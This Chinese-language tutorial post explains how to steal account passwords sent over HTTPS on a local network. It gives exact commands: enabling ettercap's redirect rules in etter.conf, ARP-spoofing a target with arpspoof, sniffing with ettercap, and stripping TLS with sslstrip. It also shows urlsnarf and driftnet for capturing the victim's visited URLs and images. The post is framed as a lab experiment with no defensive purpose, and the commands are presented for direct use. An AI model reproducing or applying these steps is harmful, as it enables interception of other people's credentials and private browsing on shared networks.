针对HTTPS协议获取账号密码

如果用arpspoof配合ettercap只能获得http协议下的相关账号密码。但是,现在普遍https协议,那么这种方法就GG了。


首先,由于默认的ettercap只能嗅探http协议下的密码,所以,若进行https协议下的嗅探,那么,就要对ettercap配置文件做一些修改。

路径:
/etc/ettercap/etter.conf

针对HTTPS协议获取账号密码_第1张图片
针对HTTPS协议获取账号密码_第2张图片

去掉注释,让命令生效就可以了。同时保存退出。

然后,用arpspoof配合ettercap以及sslstrip就可以获得https下的密码。

补充:sslstrip是一款可以将https还原成http的工具。

命令:

arpspoof -t 192.168.1.130 192.168.1.1 -i eth0        进行欺骗

ettercap -Tq -i eth0        进行嗅探

sslstrip -a -f -k

注意:并不是每次都能成功抓到用户名密码,同时,推荐给kali装一个usb外置网卡,否则,在做实验的时候总会遇到各种坑!这些坑是新手不容易跨过的!因为虚拟机毕竟只是虚拟机!同时,防火墙、杀毒软件是否也会影响实验效果?有待考量。

最后,补充一下kali中几个和本次实验相关的工具,以及使用方法:

urlsnarf -i eth0
在成功的ARP欺骗后,可以利用这个命令抓取流量,看目标浏览了哪些网页。

driftnet -i eth0
同理,在arp欺骗成功后,可以从网卡中抓取目标浏览的图片,但是只能是图片,而且还有一个缺陷,那就是不是所有的图片都能抓到。

你可能感兴趣的:(针对HTTPS协议获取账号密码)